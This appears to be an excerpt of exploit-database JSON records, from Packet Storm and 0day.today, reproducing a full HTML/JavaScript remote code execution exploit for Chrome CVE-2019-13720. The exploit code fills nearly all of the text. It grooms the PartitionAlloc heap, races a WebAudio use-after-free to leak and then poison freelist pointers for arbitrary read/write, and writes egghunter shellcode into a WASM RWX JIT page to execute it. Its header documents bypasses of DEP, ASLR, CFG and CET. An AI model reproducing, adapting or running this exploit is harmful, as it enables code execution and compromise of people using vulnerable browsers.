SpanIndex.toString(10)); \nBucketAddress = LeakQword(FreeListHead, SlotSpanMetaAddress); \nHelperBigInt[0] = BucketAddress; \nDebugLog(\"... leaked bucket address of \" + HelperDword[1].toString(16) + HelperDword[0].toString(16) + \" for slot span \" + SpanIndex.toString(10)); \n \nif(BucketAddress != BigInt(0)) { \nBucketAddress = BucketAddress + BigInt(0x18); // PartitionBucket.slot_size \nBucketSize = LeakQword(FreeListHead, BucketAddress); \nHelperBigInt[0] = BucketSize; \nDebugLog(\"... leaked bucket size is \" + HelperDword[1].toString(16) + \" \" + HelperDword[0].toString(16) + \" for slot span \" + SpanIndex.toString(10)); \n \nif(HelperDword[0] == SlotSize) { \nDebugLog(\"... found desired slot size! 
Reading freelist head for SlotSpan...\"); \nSlotSpanFreeListAddress = BigInt(SuperPageMetadataBase) + BigInt((SpanIndex * 0x20) + 0x20); // Always an extra 0x20 to account for start of SuperPage struct \nHelperBigInt[0] = LeakQword(FreeListHead, SlotSpanFreeListAddress); \nDebugLog(\"... leaked slot span freelist address of \" + HelperDword[1].toString(16) + HelperDword[0].toString(16) + \" for slot span \" + SpanIndex.toString(10)); \nreturn HelperBigInt[0]; \n} \n} \n} \n} \n \nfunction ExecutePayload(FreeListHead) { \nvar WasmExport = CreateWasmJITExport(); \nlet FileReaderObj = new FileReader; \nlet FileReaderLoaderSize = 0x140; // Literal size is 0x128, 0x140 is the bucket size post-alignment \n \nDebugLog(\"... WASM module and FileReader created.\"); \nFileReaderObj.onerror = WasmExport; \nlet FileReaderLoaderPtr = HuntSlotSpanHead(FreeListHead, FileReaderLoaderSize, FeedforwardSuperPageMetadata); \n \nif (!FileReaderLoaderPtr) { \nDebugLog(\"... failed to obtain free list head for bucket size 0x140 slot span\"); \nreturn; \n} \n \nHelperBigInt[0] = FileReaderLoaderPtr; \nDebugLog(\"... estimated a FileReaderLoader alloc address of \" + HelperDword[1].toString(16) + HelperDword[0].toString(16)); \nFileReaderObj.readAsArrayBuffer(new Blob([])); // It is not the blob causing the allocation: FileReaderLoader itself as a class is allocated into the FastMalloc Extent \nlet ValidationPtr = HuntSlotSpanHead(FreeListHead, FileReaderLoaderSize, FeedforwardSuperPageMetadata); \n \nif(ValidationPtr != FileReaderLoaderPtr) { \nHelperBigInt[0] = ValidationPtr; \nDebugLog(\"... 
successfully validated re-claim of FileReaderLoader slot (free list head for slot span has been re-claimed) at \" + HelperDword[1].toString(16) + HelperDword[0].toString(16)); \n \nlet FileReaderPtr = LeakQword(FreeListHead, FileReaderLoaderPtr + BigInt(0x10)) - BigInt(0x68); \nlet VectorPtr = LeakQword(FreeListHead, FileReaderPtr + BigInt(0x28)); \nlet RegisteredEventListenerPtr = LeakQword(FreeListHead, VectorPtr); \nlet EventListenerPtr = LeakQword(FreeListHead, RegisteredEventListenerPtr); \nlet EventHandlerPtr = LeakQword(FreeListHead, EventListenerPtr + BigInt(0x8)); \nlet JsFuncObjPtr = LeakQword(FreeListHead, EventHandlerPtr + BigInt(0x8)); \nlet JsFuncPtr = LeakQword(FreeListHead, JsFuncObjPtr) - BigInt(1); \nlet SharedFuncInfoPtr = LeakQword(FreeListHead, JsFuncPtr + BigInt(0x18)) - BigInt(1); \nlet WasmExportedFunctDataPtr = LeakQword(FreeListHead, SharedFuncInfoPtr + BigInt(0x8)) - BigInt(1); \nlet WasmInstancePtr = LeakQword(FreeListHead, WasmExportedFunctDataPtr + BigInt(0x10)) - BigInt(1); \nlet StubAddrFieldOffset = undefined; \n \nswitch (MajorVersion) { \ncase 77: \nStubAddrFieldOffset = BigInt(0x8) * BigInt(16); \nbreak; \ncase 76: \nStubAddrFieldOffset = BigInt(0x8) * BigInt(17); \nbreak \n} \n \nlet RwxJitStubPtr = LeakQword(FreeListHead, WasmInstancePtr + StubAddrFieldOffset); \nHelperBigInt[0] = RwxJitStubPtr; \nDebugLog(\"... resolved JIT stub address of \" + HelperDword[1].toString(16) + HelperDword[0].toString(16)); \n \nfor(var x = 0; x < Egghunter.length; x += 8) { \nJitChunkAddress = RwxJitStubPtr + BigInt(x); \nHelperBigInt[0] = JitChunkAddress; \n//DebugLog(\"... writing chunk of egghunter shellcode at offset \" + x.toString(10) + \" to JIT region at \" + HelperDword[1].toString(16) + HelperDword[0].toString(16)); \n \nfor(var y = 0; y < 8; y++) { \nHelperUint8[y] = Egghunter[x + y]; \n} \n \nWriteQword(FreeListHead, JitChunkAddress, HelperBigInt[0]); \n} \n \nHelperBigInt[0] = RwxJitStubPtr; \nDebugLog(\"... 
executing shellcode at \" + HelperDword[1].toString(16) + HelperDword[0].toString(16)); \nWasmExport(); \n} \nelse { \nDebugLog(\"... failed to validate re-claim of FileReaderLoader slot at \" + HelperDword[1].toString(16) + HelperDword[0].toString(16)); \n} \n} \n \nasync function PrePayloadHeapGroom() { \nDebugLog(\"... grooming heap in preparation for R/W primitive creation and payload execution...\"); \nawait GC(); \nDoubleAllocAudioBufs = []; // These were the \"holders\" making sure Chrome itself didn't re-claim feedforward up until this point. Now free and immediately re-claim them, once again as audio buffers. \n \nfor (var j = 0; j < 80; j++) { \nMutableFreeListAudioBufs.push(SharedAudioCtx.createBuffer(1, 2, 10000)); \n} \n \n// At this stage, feedforward is double allocated. Once as a feedforward or IIRFilters, and once as an audio buffer. Here we are putting it into double use, wherein as a feedforward it will now be (truly) free (and in the freelist), while in the other it is a committed/allocated audio buffer we can R/W. \n \nIIRFilters = new Array(1); \nawait GC(); \n \nfor (var j = 0; j < 336; j++) { \nImageDataArray.push(new ImageData(1, 2)); \n} \n \nImageDataArray = new Array(10); \nawait GC(); \n \nfor (var j = 0; j < MutableFreeListAudioBufs.length; j++) { \nlet MutableFreeListEntry = new BigUint64Array(MutableFreeListAudioBufs[j].getChannelData(0).buffer); \nif (MutableFreeListEntry[0] != BigInt(0)) { \nlet FreeListHeadPtr = GetPartitionPageMetadata(ReverseBigInt(MutableFreeListEntry[0])); // Extract the Super Page base/metadata entry for the leaked flink from feedforward: this will be in an ArrayMalloc Extent as opposed to the FastMalloc Extent. \nlet AllocCount = 0; \nMutableFreeListEntry[0] = ReverseBigInt(FreeListHeadPtr); \n \n// Spray new 8 byte allocations until our (controlled) poisoned free list flink entry is allocated \n \ndo { \nGcPreventer.push(new ArrayBuffer(8)); \n \nif (++AllocCount > 0x100000) { \nDebugLog(\"... 
failed to re-claim final free list flink with alloc spray\"); \nreturn; // If we sprayed this number of allocations without our poisoned flink being consumed, assume the re-claim failed \n} \n} while (MutableFreeListEntry[0] != BigInt(0)); \n \n// The last allocation consumed our mutable free list flink entry (which we had poisoned the flink of to point at the free list head metadata on the Super Page head). \n \nlet FreeListHead = new BigUint64Array(new ArrayBuffer(8)); // Alloc the free list head itself. We can now control where new allocs are made without needing to do sprays. \nGcPreventer.push(FreeListHead); \nExecutePayload(FreeListHead); \nreturn; \n} \n} \n \nreturn; \n} \n \nasync function DoubleAllocUAF(FeedforwardAddress, CallbackFunc) { \nlet NumberOfChannels = 1; \nlet TempAudioCtx = new OfflineAudioContext(NumberOfChannels, 48000 * 100, 48000); \nlet AudioBufferSourceNode = TempAudioCtx.createBufferSource(); \nlet ConvolverNode = TempAudioCtx.createConvolver(); \nlet Finished = false; \n \n// Create and initialize two shared audio buffers: one for the buffer source, the other for the convolver (UAF) \n \nlet BigSourceBuf = TempAudioCtx.createBuffer(NumberOfChannels, 0x100, 48000); \nlet SmallUafBuf = TempAudioCtx.createBuffer(NumberOfChannels, 0x2, 48000); \n \nSmallUafBuf.getChannelData(0).fill(0); \n \nfor (var i = 0; i < NumberOfChannels; i++) { \nvar ChannelData = new BigUint64Array(BigSourceBuf.getChannelData(i).buffer); \nChannelData[0] = FeedforwardAddress; \n} \n \nAudioBufferSourceNode.buffer = BigSourceBuf; \nConvolverNode.buffer = SmallUafBuf; \n \n// Setup the audio processing graph and begin rendering \n \nAudioBufferSourceNode.loop = true; \nAudioBufferSourceNode.loopStart = 0; \nAudioBufferSourceNode.loopEnd = 1; \nAudioBufferSourceNode.connect(ConvolverNode); \nConvolverNode.connect(TempAudioCtx.destination); \nAudioBufferSourceNode.start(); \n \nTempAudioCtx.startRendering().then(function(Buf) { \nBuf = null; \n \nif (Finished) { 
\nTempAudioCtx = null; \nsetTimeout(CallbackFunc, 200); \nreturn; \n} else { \nFinished = true; \nsetTimeout(function() { DoubleAllocUAF(FeedforwardAddress, CallbackFunc); }, 1); \n} \n}); \n \nwhile (!Finished) { \nConvolverNode.buffer = null; \nawait Sleep(1); // Give a small bit of time for the renderer to write the feedforward address into the freed buffer \n \nif (Finished) { \nbreak; \n} \n \nfor (let i = 0; i < IIRFilters.length; i++) { \nOutputFloatArray.fill(0); // Initialize the array to all 0's the Nyquist filter created by getFrequencyResponse will see it populated by PI. \nIIRFilters[i].getFrequencyResponse(OutputFloatArray, OutputFloatArray, OutputFloatArray); \n \nif (OutputFloatArray[0] != 3.1415927410125732) { \nFinished = true; \nDoubleAllocAudioBufs.push(TempAudioCtx.createBuffer(1, 1, 10000)); // These 2 allocs are accessing the fake flink in the feedforward array and re-claiming/\"holding\" it until the final UAF callback is called. We do not want Chrome to accidentally re-claim feedforward on its own. \nDoubleAllocAudioBufs.push(TempAudioCtx.createBuffer(1, 1, 10000)); \nAudioBufferSourceNode.disconnect(); \nConvolverNode.disconnect(); \nreturn; \n} \n} \n \nConvolverNode.buffer = SmallUafBuf; \nawait Sleep(1); \n} \n} \n \nfunction InfoleakUAFCallback(LeakedFlinkPtr, RenderCount) { \nSharedAudioCtx = new OfflineAudioContext(1, 1, 3000); // This is a globally scoped context: its initialization location is highly sensitive to the heap layout later on (created after the infoleak UAF, but before the pre-payload heap grooming where it is used) \nHelperBigInt[0] = LeakedFlinkPtr; \nDebugLog(\"... leaked free list ptr from ScriptNode audio handler at iteration \" + RenderCount.toString(10) + \": \" + HelperDword[1].toString(16) + HelperDword[0].toString(16)); \nHelperBigInt[0] = GetSuperPageBase(LeakedFlinkPtr); \nDebugLog(\"... 
Super page: \" + HelperDword[1].toString(16) + HelperDword[0].toString(16)); \nFeedforwardSuperPageBase = (HelperBigInt[0] - (BigInt(0x200000) * BigInt(42))); // Feedforward and the leaked ptr will share an extent, but feedforward will be in a bucket size 0x30 slot span on partition page index 27 of the first Super Page, while the location of the leaked ptr will be within a size 0x200 bucket size slot span on the second Super Page: after my heap grooming, this leaked ptr will consistently fall on Super Page 43 of 44 regardless of whether it falls in to a 0x200 or 0x240 slot span. \nHelperBigInt[0] = FeedforwardSuperPageBase; \nDebugLog(\"... first Super Page in extent: \" + HelperDword[1].toString(16) + HelperDword[0].toString(16)); \nHelperBigInt[0] = GetSuperPageMetadata(FeedforwardSuperPageBase); \nFeedforwardSuperPageMetadata = HelperBigInt[0]; // This is needed for later in the exploit. \nIIRFilterFeedforwardAllocPtr = GetPartitionPageBase(FeedforwardSuperPageBase, BigInt(27)) + BigInt(0xFF0); // Offset 0xFF0 in to the 0x30 slot span on the first Super Page will translate to slot index 86, which will reliably contain the previously sprayed feedforward data. \nHelperBigInt[0] = IIRFilterFeedforwardAllocPtr; \nDebugLog(\"... IIRFilterFeedforwardAllocPtr: \" + HelperDword[1].toString(16) + HelperDword[0].toString(16)); \nDoubleAllocUAF(ReverseBigInt(IIRFilterFeedforwardAllocPtr), PrePayloadHeapGroom); \n} \n \nasync function InfoleakUAF(CallbackFunc) { \nlet TempAudioCtx = new OfflineAudioContext(1, 48000 * 100, 48000); // A sample frame is a Float32: here we dictate what the total/maximum number of frames will be. When rendering begins a destination buffer of size (4 * NumberOfSampleFrame) will be allocated to hold the processed data after it travels through the ConvolverNode and ScriptNode. 
\nlet AudioBufferSourceNode = TempAudioCtx.createBufferSource(); \nlet ConvolverNode = TempAudioCtx.createConvolver(); \nlet ScriptNode = TempAudioCtx.createScriptProcessor(0x4000, 1, 1); // 0x4000 buffer size, 1 input channel 1 output channel. \nlet ChannelBuf = TempAudioCtx.createBuffer(1, 1, 48000); \nlet OriginBuf = TempAudioCtx.createBuffer(1, 1, 48000); \nlet Finished = false; \nlet RenderCount = 0; \n \nConvolverNode.buffer = ChannelBuf; \nAudioBufferSourceNode.buffer = OriginBuf; // The source of all data flowing through the audio processing graph: its contents will be repeatedly duplicated and sent through the graph until the OfflineAudioContext.destination is full \n \nAudioBufferSourceNode.loop = true; \nAudioBufferSourceNode.loopStart = 0; \nAudioBufferSourceNode.loopEnd = 1; \n \nChannelBuf.getChannelData(0).fill(0); // This is the SharedAudioBuffer that will be shared between this thread and the renderer thread \nAudioBufferSourceNode.connect(ConvolverNode); \nConvolverNode.connect(ScriptNode); \nScriptNode.connect(TempAudioCtx.destination); \n \nAudioBufferSourceNode.start(); \n \nScriptNode.onaudioprocess = function(Evt) { \nRenderCount++; \nfor (let i = 0; i < 1; i++) { \nlet ChannelInputBuf = new Uint32Array(Evt.inputBuffer.getChannelData(i).buffer); \n \nfor (let j = 0; j < ChannelInputBuf.length; j++) { \n/* \nNotably, it is not only the first frame of the input buffer which is checked for the leaked flink. \nThere are 16384 frames (each the size of a Float32) copied into the input channel buffer each \ntime this handler receives an event. Typically only 0-1 of these frames will contain a leaked \nflink freelist pointer. 
\n*/ \n \nif (j + 1 < ChannelInputBuf.length && ChannelInputBuf[j] != 0 && ChannelInputBuf[j + 1] != 0) { \nlet TempHelperBigInt = new BigUint64Array(1); \nlet TempHelperDword = new Uint32Array(TempHelperBigInt.buffer); \n \nTempHelperDword[0] = ChannelInputBuf[j + 0]; // Extract a QWORD from the SharedAudioBuffer \nTempHelperDword[1] = ChannelInputBuf[j + 1]; \n \nlet LeakedFlinkPtr = ReverseBigInt(TempHelperBigInt[0]); \n \n// Check QWORD from SharedAudioBuffer for a non-zero value \n \nif (LeakedFlinkPtr >> BigInt(32) > BigInt(0x8000)) { \nLeakedFlinkPtr -= BigInt(0x800000000000); // Valid usermode pointer, or within kernel region? \n} \n \nif (LeakedFlinkPtr < BigInt(0xFFFFFFFFFFFF) && LeakedFlinkPtr > BigInt(0xFFFFFFFF)) { \n// Valid leak: end the recursion cycle for this UAF and execute a callback \n \nFinished = true; \nEvt = null; \nAudioBufferSourceNode.disconnect(); \nScriptNode.disconnect(); \nConvolverNode.disconnect(); \nsetTimeout(function() { CallbackFunc(LeakedFlinkPtr, RenderCount); }, 1); \nreturn; \n} \n} \n} \n} \n}; \n \nTempAudioCtx.startRendering().then(function(Buf) { \nBuf = null; // Rendering is finished: always consider this the end of this iteration of attempted UAF and recursively re-execute the UAF until the ScriptNode picks up a UAF and ends the recursion cycle \n \nif (!Finished) { \nFinished = true; \nInfoleakUAF(CallbackFunc); \n \n} \n}); \n \n/* \nAttack the race condition which allows for a free list flink to be copied \ninto the ScriptNode input channel buffer: the renderer thread is receiving \ndata into the SharedBuffer in the Convolver, processing it, then copying \nit into the ScriptNode input channel until it is full (then the ScriptNode \nreceives an event). The SharedBuffer must be freed precisely between the \ntime when new data is received from the BufferSource, and the processed data \nis copied into the ScriptNode. 
Simply freeing the buffer will not work, \nsince the next chunk of data from the BufferSource will not be placed into \nSharedBuffer if it is NULL. However, there is no check if SharedBuffer is \nNULL when the processed data it contains is copied into the ScriptNode input. \n*/ \n \nwhile (!Finished) { \nConvolverNode.buffer = null; \nConvolverNode.buffer = ChannelBuf; \nawait Sleep(1); // 1ms \n} \n} \n \nfunction FeedforwardHeapGroom() { \nlet TempAudioCtx = new OfflineAudioContext(1, 48000 * 100, 48000); \nlet FeedforwardArray = new Float64Array(2); // 0x30 allocation. Size may be adjusted: 20 = 0xa0 size. 20 is max. Does not influence contained data. \nlet FeedbackArray = new Float64Array(1); // Has no effect on allocation size but directly influences contained data. \n \n// Spray 0x30 allocations into the FastAlloc Extent (Super Page 1/2). The debug egg can be used to locate this Extent in memory. \n \nFeedbackArray[0] = DebugEgg; // Modifying this value controls the data at offset 0x18 of the 0x30 slot. Value from 0xeeeeeeee egg: 1f 1a eb 47 92 24 f1 bd 0xbdf1249247eb1a1f \nFeedforwardArray[0] = 0; // Changing these feedforward values has no effect on memory at leaked ptr \nFeedforwardArray[1] = -1; \n \nfor (let i = 0; i < (256 * 1); i++) { // The 0x30 slot span will typically fall on Partition Page 27 of the first Super Page of the FastMalloc Extent when these IIR filters are created directly after page initialization. \nIIRFilters.push(TempAudioCtx.createIIRFilter(FeedforwardArray, FeedbackArray)); \n} \n \n// Clog the free 0x240 slots in the first Super Page of the FastAlloc Extent: chrome_child!blink::BackgroundHTMLParser::Create+0x2f triggers an 0x230 during init which causes an 0x240 slot span to be created in the first Super Page. \n \nlet Bucket240Slots = 62; // 63 will cause one additional 0x240 alloc in the final Super Page (44), resulting in a potential issue with delta from leaked pointer. 61 and lower will consistently crash. 
\n \nfor(var x = 0; x < Bucket240Slots; x++) { // Size 0x240 slot spans have 64 slots in them. This count ensures the 0x240 slot span in the first Super Page will be clogged. Only 1 alloc (of size 0x230) will be present in 0x240 slot span. \nTempConvolver = TempAudioCtx.createConvolver(); \nAudioBuf = TempAudioCtx.createBuffer(1, 0x10, 48000); \nTempConvolver.buffer = AudioBuf; \nGcPreventer.push(AudioBuf); \nGcPreventer.push(TempConvolver); \n} \n \n// Allocs of 0x240 will fall into a slot span on Super Page 43. However, 0x200 will fall in to 42. Spray 32 0x200 allocs to create/clog a slot span on Super Page 42 to ensure this does not happen. \n \nlet Bucket200Slots = 36; // An extra couple slot allocs in case there are open slots <= 42 which may sink hole the desired memory leak pointer from SetBuffer. Too many of these allocs may push the leaked pointer into 44 though, so this is a delicate balance. \n \nfor(var x = 0; x < (Bucket200Slots / 2); x++) { \nTempConvolver = TempAudioCtx.createConvolver(); // Each convolver triggers 2 FastZeroedMalloc of size 0x200. So 16 are needed to clog a slot span of 32 slots (which is universally the default 0x200 size) \nGcPreventer.push(TempConvolver); \n} \n} \n \ntry { \nvar BrowserVersion = navigator.userAgent.split(\"Chrome/\")[1].split(\" Safari/\")[0]; \nMajorVersion = parseInt(BrowserVersion.substr(0, 2)); \n \nif (MajorVersion <= 78) { \nValidBrowser = true; \n \nif(MajorVersion != 76) { \nalert(\"This exploit has only been tested on Google Chrome 76.0.3809.132 Official Build 64-bit: for most reliable results use this version\"); \n} \n} \nelse { \nalert(\"CVE-2019-13720 was patched in Google Chrome 78.0.3904.87: invalid browser\"); \n} \n} \ncatch (e) { \nDebugLog(\"... failed to parse browser version from user agent.\"); \n} \n \nif(ValidBrowser) { \nFeedforwardHeapGroom(); \nInfoleakUAF(InfoleakUAFCallback); \n} \nelse { \nDebugLog(\"... 
unsupported browser version \" + navigator.userAgent); \n} \n</script> \n</html> \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/167066/googlechrome780390470-exec.txt"}], "zdt": [{"lastseen": "2022-05-12T09:33:39", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-12T00:00:00", "type": "zdt", "title": "Google Chrome 78.0.3904.70 - Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720"], "modified": "2022-05-12T00:00:00", "id": "1337DAY-ID-37719", "href": "https://0day.today/exploit/description/37719", "sourceData": "# Exploit Title: Google Chrome 78.0.3904.70 - Remote Code Execution\n# Exploit Author: deadlock (Forrest Orr)\n# Type: RCE\n# Platform: Windows\n# Website: https://forrest-orr.net\n# Twitter: https://twitter.com/_ForrestOrr\n# Vendor Homepage: https://www.google.com/chrome/\n# Software Link: https://github.com/forrest-orr/WizardOpium/blob/main/Google_Chrome_Portable_64bit_v76.0.3809.132.zip\n# Versions: Chrome 76 - 78.0.3904.70\n# 
Tested on: Chrome 76.0.3809.132 Official Build 64-bit on Windows 10 x64\n# CVE: CVE-2019-13720\n# Bypasses: DEP, High Entropy ASLR, CFG, CET\n# Github: https://github.com/forrest-orr/WizardOpium\n\n<html>\n<script>\n/*;; --------------------------------------------------------------------- |\n;;;; Google Chrome Use After Free - CVE-2019-13720 - Wizard Opium |\n;;;; --------------------------------------------------------------------- |\n;;;; Author: deadlock (Forrest Orr) - 2022 |\n;;;; --------------------------------------------------------------------- |\n;;;; Licensed under GNU GPLv3 |\n;;;; --------------------------------------------------------------------- |\n;;;; Tested with Chrome 76.0.3809.132 Official Build 64-bit on Windows 10 |\n;;;; 64-bit with CPU core counts: |\n;;;; ~ 16 cores (non-virtualized) | works |\n;;;; ~ 4 cores (virtualized) | works |\n;;;; ~ 2 cores (virtualized) | works |\n;;;; ~ 1 core (virtualized) | fails |\n;;;; |\n;;;; All of these tests finished successfully with a 95%+ success rate |\n;;;; with the exception of the 1 core tests, which fail with a 100% |\n;;;; frequency. Due to the nature of the exploit as both a UAF highly |\n;;;; sensitive to the state of the heap and a race condition, it appears |\n;;;; that a single core is unable to reliably reproduce the UAF or any |\n;;;; kind of consistency in the heap between executions. |\n;;;; --------------------------------------------------------------------- |\n;;;; Bypasses: DEP, High Entropy ASLR, CFG, CET |\n;;;; --------------------------------------------------------------------- |\n;;;; ## Sandboxing |\n;;;; ~ Chrome uses an isolated content child process running under a |\n;;;; restricted token below Low Integrity to render JavaScript. |\n;;;; ~ Child process creation is restricted via Windows exploit |\n;;;; mitigation features on the OS level for Chrome renderers. 
|\n;;;; ~ The original WizardOpium chain used a win32k LPE exploit as a |\n;;;; sandbox escape (this was limited to Windows 7 since in newer |\n;;;; versions of Windows win32k syscalls are locked in Chrome for |\n;;;; security purposes). |\n;;;; ~ Run Chrome with the \"--no-sandbox\" parameter in order to execute |\n;;;; the WinExec shellcode within this exploit source. |\n;;;; --------------------------------------------------------------------- |\n;;;; ## Notes |\n;;;; ~ This UAF targets the PartitionAlloc heap and abuses the freelist |\n;;;; for both infoleaks and R/W primitives. |\n;;;; ~ The exploit should in theory work in any version of Chrome up to |\n;;;; 78.0.3904.87 but has only been tested on 76.0.3809.132. |\n;;;; ~ WASM JIT/egghunter design for code execution: a WASM module is |\n;;;; initialized resulting in the creation of a single page of +RWX |\n;;;; JIT memory. This is then overwritten with a 673 byte egghunter |\n;;;; shellcode. |\n;;;; ~ The egghunter will scan through all committed +RW regions of |\n;;;; private memory within the compromised chrome.exe renderer process |\n;;;; and mark any region it identifies as +RWX which contains the egg |\n;;;; QWORD bytes and subsequentially execute it via a CALL instruction. |\n;;;; ~ Shellcode used within this exploit should be encoded as a Uint8 |\n;;;; array prefixed by the following egg QWORD bytes: |\n;;;; 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88 |\n;;;; --------------------------------------------------------------------- |\n;;;; ## Credits |\n;;;; ~ Kaspersky for identifying and analyzing the WizardOpium exploit |\n;;;; chain in the wild. 
|\n;;;; -------------------------------------------------------------------- */\n\nconst Shellcode = new Uint8Array([ /* shellcode byte array removed */ ]);\nconst Egghunter = new Uint8Array([ /* egghunter byte array removed */ ]);\nlet DebugEgg = 0xeeeeeeee; // Used to create a magic QWORD to locate FastMalloc Extent/Super Pages in memory.\nlet GcPreventer = [];\nlet IIRFilters = [];\nvar SharedAudioCtx = undefined;\nlet FeedforwardSuperPageMetadata = undefined;\nlet OutputFloatArray = new Float32Array(10);\nlet MutableFreeListAudioBufs = [];\nlet DoubleAllocAudioBufs = [];\nlet ImageDataArray = [];\nconst EnableDebug = true;\nconst AlertOutput = false;\nvar HelperBuf = new ArrayBuffer(8);\nvar HelperDbl = new Float64Array(HelperBuf);\nvar HelperDword = new Uint32Array(HelperBuf);\nvar HelperBigInt = new BigUint64Array(HelperBuf);\nvar HelperUint8 = new Uint8Array(HelperBuf);\n\nfunction DebugLog(Message) {\n if(EnableDebug) {\n if(AlertOutput) {\n alert(Message);\n }\n else {\n console.log(Message); // In IE, console only works if devtools is open.\n }\n }\n}\n\nfunction Sleep(delay) {\n return new Promise(resolve => setTimeout(resolve, delay))\n}\n\nfunction ReverseBigInt(Val) {\n let ReversedVal = BigInt(0);\n let TempVal = Val;\n\n for (let i = 0; i < 8; i++) {\n ReversedVal = ReversedVal << BigInt(8);\n ReversedVal += TempVal & BigInt(0xFF);\n TempVal = TempVal >> BigInt(8);\n }\n\n return ReversedVal;\n}\n\nfunction ClearBigIntLow21(Val) {\n let BitMask = (BigInt(1) << BigInt(21)) - BigInt(1); // 0000000000000000000000000000000000000000000111111111111111111111\n let ClearedVal = Val & ~BitMask; // 1111111111111111111111111111111111111111111000000000000000000000\n return ClearedVal;\n}\n\nlet GetSuperPageBase = ClearBigIntLow21;\n\nfunction GetSuperPageMetadata(LeakedPtr) {\n 
let SuperPageBase = GetSuperPageBase(LeakedPtr);\n return SuperPageBase + BigInt(0x1000); // Front and end Partition Pages of Super Page are Guard Pages, with the exception of a single System Page at offset 0x1000 (second System Page) of the front end Partition Page\n}\n\nfunction GetPartitionPageIndex(LeakedPtr) {\n let Low21Mask = (BigInt(1) << BigInt(21)) - BigInt(1);\n let Index = (LeakedPtr & Low21Mask) >> BigInt(14);\n return Index;\n}\n\n\nfunction GetPartitionPageMetadata(LeakedPtr) {\n let Index = GetPartitionPageIndex(LeakedPtr);\n let partitionPageMetadataPtr = GetSuperPageMetadata(LeakedPtr) + (Index * BigInt(0x20));\n return partitionPageMetadataPtr;\n}\n\nfunction GetPartitionPageBase(LeakedPtr, Index) {\n let SuperPageBase = GetSuperPageBase(LeakedPtr);\n let PartitionPageBase = SuperPageBase + (Index << BigInt(14));\n return PartitionPageBase;\n}\n\nfunction GC() {\n let MyPromise = new Promise(function(GcCallback) {\n let Arg;\n \n for (var i = 0; i < 400; i++) {\n new ArrayBuffer(1024 * 1024 * 60).buffer;\n }\n \n GcCallback(Arg);\n });\n \n return MyPromise;\n}\n\n/*\nchrome_child!WTF::ArrayBufferContents::AllocateMemoryWithFlags+0xcf:\n00007ffa`cc086513 488b0e mov rcx,qword ptr [rsi] ds:00007ffe`0fc70000=????????????????\n*/\n\nfunction LeakQword(FreeListHead, TargetAddress) {\n FreeListHead[0] = TargetAddress;\n let TempVal = new BigUint64Array;\n TempVal.buffer;\n GcPreventer.push(TempVal);\n return ReverseBigInt(FreeListHead[0]);\n}\n \nfunction WriteQword(FreeListHead, TargetAddress, Val) {\n FreeListHead[0] = TargetAddress;\n let TempVal = new BigUint64Array(1);\n TempVal.buffer;\n TempVal[0] = Val;\n GcPreventer.push(TempVal);\n}\n\nfunction CreateWasmJITExport() {\n /*\n After this function returns, a new region of memory will appear with a\n single system page of 0x1000 bytes set to RWX for the JIT region for\n this WASM module\n \n 0x00000ACDB6790000:0x40000000 | Private\n 0x00000ACDB6790000:0x00001000 | RX | 0x00000000 | Abnormal 
private executable memory\n 0x00000ACDB6791000:0x00001000 | RWX | 0x00000000 | Abnormal private executable memory\n */\n \n var ImportObj = { imports: { imported_func: arg => console.log(arg) } };\n const WasmModuleBytes = [0x0, 0x61, 0x73, 0x6d, 0x1, 0x0, 0x0, 0x0, 0x1, 0x8, 0x2, 0x60, 0x1, 0x7f, 0x0, 0x60, 0x0, 0x0, 0x2, 0x19, 0x1, 0x7, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0xd, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x0, 0x3, 0x2, 0x1, 0x1, 0x7, 0x11, 0x1, 0xd, 0x65, 0x78, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x1, 0xa, 0x8, 0x1, 0x6, 0x0, 0x41, 0x2a, 0x10, 0x0, 0xb];\n const WasmCode = new Uint8Array(WasmModuleBytes);\n const WasmModule = new WebAssembly.Instance(new WebAssembly.Module(WasmCode), ImportObj);\n return WasmModule.exports.exported_func;\n}\n\n/*\nstruct __attribute__((packed)) SlotSpanMetadata {\n unsigned long freelist_head;\n unsigned long next_slot_span;\n unsigned long bucket;\n uint32_t marked_full : 1;\n uint32_t num_allocated_slots : 13;\n uint32_t num_unprovisioned_slots : 13;\n uint32_t can_store_raw_size : 1;\n uint32_t freelist_is_sorted : 1;\n uint32_t unused1 : (32 - 1 - 2 * 13 - 1 - 1);\n uint16_t in_empty_cache : 1;\n uint16_t empty_cache_index : 7;\n uint16_t unused2 : (16 - 1 - 7);\n};\n\nstruct PartitionPage {\n union {\n struct SlotSpanMetadata span;\n size_t raw_size;\n struct PartitionSuperPageExtentEntry head;\n struct {\n char pad[32 - sizeof(uint16_t)];\n uint16_t slot_span_metadata_offset;\n };\n };\n};\n\nstruct PartitionBucket {\n unsigned long active_slot_spans_head;\n unsigned long empty_slot_spans_head;\n unsigned long decommitted_slot_spans_head;\n uint32_t slot_size;\n uint32_t num_system_pages_per_slot_span : 8;\n uint32_t num_full_slot_spans : 24;\n};\n*/\n\nfunction 